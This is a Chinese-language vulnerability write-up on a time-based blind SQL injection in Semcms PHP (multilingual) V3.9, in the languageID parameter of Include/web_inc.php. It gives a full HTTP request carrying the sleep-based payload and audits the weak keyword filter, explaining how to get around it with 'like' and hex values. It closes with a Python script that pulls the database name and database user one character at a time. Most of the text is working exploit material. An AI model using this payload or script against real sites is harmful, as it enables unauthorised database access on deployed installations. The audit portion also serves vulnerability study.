Semcms PHP(多语)版 V3.9 sql注入漏洞¶
一、漏洞简介¶
二、漏洞影响¶
Semcms PHP(多语)版 V3.9
三、复现过程¶
漏洞详情
漏洞文件为Include下的web_inc.php文件
包
POST /Include/web_inc.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: scusername=%E6%80%BB%E8%B4%A6%E5%8F%B7; scuseradmin=Admin; scuserpass=c4ca4238a0b923820dcc509a6f75849b
Upgrade-Insecure-Requests: 1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
languageID=0 or if(substr(database(),1,1) like 0x6D,sleep(5),1);
基于时间的注入
代码审计
查看web_inc.php的关键代码
if (isset($_POST["languageID"])){$Language=test_input(verify_str($_POST["languageID"]));}else{$Language=verify_str($Language);}
if(!empty($Language)){
//网站SEO设定
$query=$db_conn->query("select * from sc_tagandseo where languageID=$Language");
$row=mysqli_fetch_array($query);
$tag_indexmetatit=datato($row['tag_indexmetatit']);// 首页标题
$tag_indexkey=datato($row['tag_indexkey']);// 首页关键词
$tag_indexdes=datato($row['tag_indexdes']);// 首页描述
......
可以看到查询语句没有利用单引号闭合
跟入过滤函数查看
function test_input($data) {
$data = str_replace("%", "percent", $data);
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data,ENT_QUOTES);
return $data;
}
function inject_check_sql($sql_str) {
return preg_match('/select|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str);
}
function verify_str($str) {
if(inject_check_sql($str)) {
exit('Sorry,You do this is wrong! (.-.)');
}
return $str;
}
过滤了一些关键字,正常的联合注入是没有办法了,可以时间盲注
利用if和sleep构造payload,因为<,=被过滤且存在htmlspecialchars函数,利用like代替
languageID=0 or if(substr(database(),1,1) like 0x6e,sleep(5),1);
附上脚本
# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests
def getDatabase(url):
s = ''
r = requests.session()
head = {'Content-Type':'application/x-www-form-urlencoded'}
for i in range(1,9):
for j in range(97,122):
data = 'languageID=0 or if(substr(database(),%s,1) like %s,sleep(5),1);' % (i,hex(j))
result = r.post(url, data, headers=head)
if(result.elapsed.total_seconds() > 5):
s = s + chr(j)
print(s)
break
print('database=' + s)
def getUser(url):
s = ''
r = requests.session()
head = {'Content-Type':'application/x-www-form-urlencoded'}
for i in range(1,21):
for j in range(64,90):
data = 'languageID=0 or if(substr(user(),%s,1) like %s,sleep(5),1);' % (i,hex(j))
result = r.post(url, data, headers=head)
if(result.elapsed.total_seconds() > 5):
s = s + chr(j).lower()
print(s)
break
print('user=' + s)
if __name__ == '__main__':
url = 'http://127.0.0.1/Include/web_inc.php'
s = getDatabase(url)
u = getUser(url)
运行截图
不过因为过滤了select,暂时不知道怎么注出数据ORZ,比如说注出user表中的密码之类的,如果有师傅愿意不吝赐教,这里万分感谢
参考链接